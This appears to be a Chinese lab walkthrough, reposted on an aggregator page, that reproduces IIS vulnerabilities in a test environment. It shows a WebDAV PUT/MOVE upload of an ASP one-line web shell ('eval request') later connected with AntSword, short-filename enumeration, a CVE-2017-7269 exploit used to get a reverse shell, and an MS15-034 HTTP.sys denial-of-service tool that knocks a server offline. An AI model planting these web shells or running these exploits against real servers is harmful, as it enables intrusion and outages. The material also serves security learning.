当前位置: 首页 > article >正文

IIS漏洞再现

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个”.”的时候,以文件最后一个”.”作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了


http://www.kler.cn/a/599611.html

相关文章:

  • conda install 和 pip install 的区别
  • 【HTML5游戏开发教程】零基础入门合成大西瓜游戏实战 | JS物理引擎+Canvas动画+完整源码详解
  • 详解Redis 核心特性与基础
  • C++相关
  • 2025高频面试算法总结篇【字符串】
  • 蓝桥杯算法题分享(二)
  • NO.55十六届蓝桥杯备战|排序|插入|选择|冒泡|堆|快速|归并(C++)
  • NLP高频面试题(十三)——什么是大模型幻觉,如何解决大模型幻觉
  • 数据结构-二叉链表存储的二叉树
  • 数字电路基础
  • jupyter 操作相关内容
  • ADB介绍
  • VL开源模型实现文本生成图片
  • 计算图(Computation Graph)
  • 在VMware17中安装使用Ubuntu虚拟机
  • 四.ffmpeg对yuv数据进行h264编码
  • 基于SpringBoot的名著阅读网站
  • 神奇的FlexBox弹性布局
  • 【docker】安装SQLServer
  • 数学概念学习